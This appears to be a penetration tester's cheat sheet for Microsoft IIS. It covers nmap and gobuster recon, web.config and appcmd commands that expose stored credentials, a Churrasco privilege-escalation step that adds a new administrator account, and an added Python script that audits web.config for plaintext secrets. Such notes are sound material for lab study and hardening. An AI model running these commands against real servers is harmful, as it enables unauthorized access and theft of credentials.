IIS
Ports
- 4XXXX/tcp
Common Pages
- Under construction
- 404
Headers
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Recon
# Nmap
nmap -p80 10.10.10.29 --script http-iis-webdav-vuln
# Other way of getting IIS version. You will see
# something like "Server: Microsoft-IIS/10.0"
curl -I http://10.10.10.29
# You can get the iisfinal.txt from hacktricks and
# feed it to gobuster.
curl "https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-L_YlVBGlH_l7w9zCtQO%2F-L_YlWYOMUA7fr799GvH%2Fiisfinal.txt?alt=media&token=de499b23-3599-45ce-ad7e-7800858b3dac" -o iisfinal.txt
gobuster dir -u http://10.10.10.29 -w iisfinal.txt
Interesting Files
# Contains SQL connection strings, passwords and other
# sensitive data. This is similar to `.htaccess` in Apache.
web.config
# index file
iisstart.htm
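
Since web.config holds connection strings and passwords, and the `X-Powered-By` header listed above discloses the stack, the file can be audited directly. The following Python check is an added example, not part of the original notes; the sample config, the finding names and `audit_web_config` are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample web.config for the demo (not taken from a real system).
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="Main" connectionString="Server=db01;Database=app;User Id=app;Password=Constructed123" />
    <add name="Reports" connectionString="Server=db01;Database=rep;Integrated Security=SSPI" />
  </connectionStrings>
  <appSettings>
    <add key="SmtpPassword" value="constructed-secret" />
    <add key="PageSize" value="25" />
  </appSettings>
  <system.webServer>
    <httpProtocol><customHeaders /></httpProtocol>
  </system.webServer>
</configuration>"""

CONNSTR_PASSWORD = re.compile(r"(?i)(?:^|;)\s*(?:password|pwd)\s*=\s*[^;]+")
SECRET_KEY_NAME = re.compile(r"(?i)password|passwd|pwd|secret|token|apikey")

def audit_web_config(xml_text):
    """Return (check, detail) findings for one web.config document."""
    root = ET.fromstring(xml_text)
    findings = []
    for section in ("connectionStrings", "appSettings"):
        node = root.find(section)
        # Sections encrypted with aspnet_regiis carry configProtectionProvider
        # and hold <EncryptedData> instead of readable <add> elements.
        if node is None or "configProtectionProvider" in node.attrib:
            continue
        for add in node.findall("add"):
            if section == "connectionStrings":
                if CONNSTR_PASSWORD.search(add.get("connectionString", "")):
                    findings.append(("plaintext-connstring-password", add.get("name", "")))
            elif SECRET_KEY_NAME.search(add.get("key", "")) and add.get("value"):
                findings.append(("plaintext-appsetting-secret", add.get("key")))
    # Flag when this file does not remove X-Powered-By; a parent-level
    # config may still remove it, so treat this as a prompt to verify.
    removed = root.findall("system.webServer/httpProtocol/customHeaders/remove")
    if not any(r.get("name", "").lower() == "x-powered-by" for r in removed):
        findings.append(("x-powered-by-not-removed", "system.webServer/httpProtocol"))
    return findings

if __name__ == "__main__":
    for check, detail in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{check}: {detail}")
```
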
Logins
- Brute force
# Nmap
nmap -p80 10.10.10.29 --script http-iis-short-name-brute
- Try to access some DLLs; they may expose a login page.
Downloads
- 10.X - latest version as of November 2021
appcmd.exe
# check if you have permissions
C:\Windows\system32\inetsrv\appcmd.exe list apppools
# may show credentials
C:\Windows\system32\inetsrv\appcmd.exe list vdir
Some Vulnerabilities
# https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco.exe -d "net user /add <username> <password>"
c:\Inetpub>churrasco.exe -d "net localgroup administrators <username> /add"